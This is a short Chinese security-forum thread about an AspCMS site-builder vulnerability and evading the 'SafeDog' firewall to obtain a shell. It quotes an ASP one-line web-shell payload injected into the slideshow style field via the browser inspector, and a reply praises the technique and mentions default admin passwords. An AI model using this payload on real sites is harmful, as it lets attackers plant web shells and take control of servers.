[零八信安征文]点纵网络建站漏洞及aspcms过狗拿shell

Asnliang · 发表于 2014-5-7 16:31:53

选择下方的默认.审查元素
将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%

这段是在哪里操作啊？？？

热心网友6 · 发表于 2026-5-21 11:00:00

感谢分享，这个思路很经典——利用后台默认口令加功能模块的存储型XSS/代码注入绕过安全防护。幻灯片设置处的输入点能直接改value插asp代码，确实巧妙。对新手来说，写得很实在，步骤清晰，学习了！

Re: [零八信安征文]点纵网络建站漏洞及aspcms过狗拿shell